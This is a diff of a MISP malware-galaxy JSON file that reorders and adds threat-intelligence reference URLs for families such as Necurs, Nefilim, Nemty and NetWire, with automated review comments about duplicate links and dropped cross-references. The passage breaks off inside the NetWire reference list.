+ "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://bin.re/blog/the-dgas-of-necurs/",
+ "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
"https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
- "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
- "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/"
+ "https://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
+ "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features"
],
"synonyms": [
"nucurs"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "97d34770-44cc-4ecb-bdce-ba11581c0e2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
"value": "Necurs"
},
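Review bot: same problem as Nautilus: the `related` link to dest-uuid 97d34770-44cc-4ecb-bdce-ba11581c0e2a is dropped without replacement. Separately, the reordered list keeps two pairs of duplicate refs: the Secureworks GOLD RIVERVIEW profile under both `http://` and `https://`, and the Intel 471 TA505 history under both `blog.intel471.com/2020/05/21/...` and `intel471.com/blog/...`; the bin.re DGA post is the only real addition. Dedupe by normalised URL in the importer.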
@@ -33365,35 +35187,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim",
- "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
- "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
- "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
- "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
"https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "http://www.secureworks.com/research/threat-profiles/gold-mansard",
- "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
+ "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/"
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
+ "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
+ "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-mansard",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
+ "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf"
],
"synonyms": [
"Nephilim"
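Review bot: the refs `https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot` and `https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html` carry the same article slug under two hostnames, so the Nefilim list now holds one report twice; keep a single entry. Separately, the pwc and sophos URLs are removed and re-added purely because the list order changed; emitting refs in a stable (sorted) order from the generator would shrink hunks like this one to the genuine additions and make the real changes reviewable.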
@@ -33403,6 +35225,21 @@
"uuid": "895f088e-a862-462c-a754-6593c6a471da",
"value": "Nefilim"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemesis",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ ],
+ "synonyms": [
+ "Project Nemesis"
+ ],
+ "type": []
+ },
+ "uuid": "2f115fca-2f72-4c20-a93e-9618e51f6e2b",
+ "value": "Nemesis"
+ },
{
"description": "",
"meta": {
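Review bot: the new Nemesis cluster is added with `"description": ""`, which leaves the entry unsearchable by anything but its name and the synonym "Project Nemesis"; the securityintelligence ref on the Domino backdoor collaboration is already in the list, so a one-line summary drawn from it would be cheap to add. The empty `"type": []` matches the neighbouring entries and is fine as is.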
@@ -33424,33 +35261,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
- "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
- "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
"https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
"https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
+ "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
"http://www.secureworks.com/research/threat-profiles/gold-mansard",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
"https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
+ "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
+ "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/"
],
"synonyms": [],
"type": []
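Review bot: `https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/` and `https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/` are the same Tesorion post at two paths and both survive the reshuffle; drop one so the Nemty refs do not carry a duplicate. The rest of the hunk is reordering only, with no references actually added or removed.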
@@ -33472,13 +35309,13 @@
"value": "Nerbian RAT"
},
{
- "description": "Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\" The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.",
+ "description": "Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\"",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
"https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html",
"https://www.virusradar.com/en/Win32_Neshta.A/description"
],
"synonyms": [],
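Review bot: the rewritten Neshta description reads better, but it drops the original file size (41,472 bytes) and the note that the sample is a Windows executable; the size is the kind of concrete detail analysts pivot on, so consider keeping a sentence such as "The original malicious file is 41,472 bytes." The quoted Belarusian word "nesta" is carried over unchanged from the old text, so its spelling should be checked against the cited write-ups while this entry is being touched.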
@@ -33492,11 +35329,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg",
- "https://youtu.be/8hJyLkLHH8Q?t=1208",
"https://youtu.be/_kzFNQySEMw?t=789",
"https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html",
- "https://content.fireeye.com/apt/rpt-apt38",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf",
+ "https://youtu.be/8hJyLkLHH8Q?t=1208",
+ "https://content.fireeye.com/apt/rpt-apt38"
],
"synonyms": [],
"type": []
@@ -33535,9 +35372,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
],
"synonyms": [
"Neteagle_Scout",
@@ -33545,15 +35382,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0ee08ab5-140c-44c3-9b0a-4a352500b14e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
"value": "NETEAGLE"
},
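Review bot: this hunk deletes the entire `related` block (the `similar` link to `0ee08ab5-140c-44c3-9b0a-4a352500b14e`, tagged `estimative-language:likelihood-probability="almost-certain"`) with nothing replacing it. If the relation now lives on the other cluster or is derived elsewhere, say so in the commit message; if the generator simply stopped emitting `related`, this is a silent loss of cross-references that downstream MISP instances use to correlate clusters.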
@@ -33562,13 +35390,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
"https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf",
+ "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users",
"https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/",
- "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/",
"https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/",
- "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users"
+ "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/"
],
"synonyms": [],
"type": []
@@ -33620,17 +35448,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://asec.ahnlab.com/en/45312/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
- "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
- "http://www.netsupportmanager.com/index.asp",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
"https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/",
+ "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
+ "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer",
+ "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html",
"https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/",
"https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
- "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html"
+ "http://www.netsupportmanager.com/index.asp"
],
"synonyms": [
"NetSupport"
@@ -33645,8 +35475,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler",
- "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
"https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [
@@ -33654,15 +35485,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "59b70721-6fed-4805-afa5-4ff2554bef81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
"value": "NetTraveler"
},
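Review bot: the `related` entry pointing at `59b70721-6fed-4805-afa5-4ff2554bef81` is removed from NetTraveler with no replacement; confirm the drop is intentional (relation retired, or now carried by the target cluster) rather than a regression in the export, and note it in the commit message so consumers know the correlation is gone.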
@@ -33671,51 +35493,57 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
- "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/",
- "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.circl.lu/pub/tr-23/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.",
- "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA",
- "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
- "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view",
- "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://community.riskiq.com/article/24759ad2",
- "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.youtube.com/watch?v=TeQdZxP0RYY",
- "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
"https://news.drweb.ru/show/?i=13281&c=23",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
"https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA",
+ "https://www.youtube.com/watch?v=TeQdZxP0RYY",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/"
+ "https://community.riskiq.com/article/24759ad2",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html",
+ "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://lmntrix.com/lab/analysis-of-netwire-rat/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.circl.lu/pub/tr-23/",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.theregister.com/2023/03/10/fbi_netwire_seizure/",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
+ "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
